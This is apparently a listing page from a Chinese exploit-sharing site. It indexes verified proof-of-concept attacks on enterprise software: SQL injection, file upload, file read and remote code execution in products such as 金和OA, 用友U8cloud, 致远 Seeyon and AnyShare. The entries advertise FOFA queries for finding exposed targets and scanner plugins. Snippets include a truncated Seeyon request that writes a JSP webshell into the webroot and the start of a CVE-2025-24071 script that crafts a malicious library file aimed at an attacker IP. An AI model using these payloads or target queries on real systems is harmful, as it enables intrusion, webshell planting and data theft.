POC 第20页
金和OA-C6-IncentivePlanFulfill.aspx存在SQL注入漏洞_秃兔安全
用友U8cloud-MeasureQueryFrameAction存在SQL注入漏洞_秃兔安全
Quicklancer存在SQL注入漏洞_秃兔安全
【通用】傲发办公通信专家 email.ashx  文件上传_秃兔安全
【通用】龙腾码支付 payservicecurl 任意文件读取漏洞_秃兔安全

【通用】龙腾码支付 payservicecurl 任意文件读取漏洞

fofa语句yakit插件 uuidpocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01425
【通用】数夫CRM file_download 任意文件读取_秃兔安全

【通用】数夫CRM file_download 任意文件读取

fofa语句yakit插件 uuid pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
01417
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔2年前
014113
【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc_秃兔安全

【通用】 CVE-2025-24071 Windows 资源管理器重大漏洞poc

github链接:pocpy脚本import os import zipfile def main(): ''' 该程序生成一个恶意 .library-ms 文件,并将其打包为 ZIP 归档。 用户需要输入文件名称和攻击者的 IP 地址。 ''' file_name = ...
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
014115
【2025特殊通用】爱数AnyShare start_service rce_秃兔安全

【2025特殊通用】爱数AnyShare start_service rce

fofa语句pocyaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2921年前
014114
【通用】中成科信票务管理系统 ReturnTicketPlance.ashx SQL注入_秃兔安全

【通用】中成科信票务管理系统 ReturnTicketPlance.ashx SQL注入

fofa语句yakit插件 uuidpocyakit yamlnuclei yaml已验证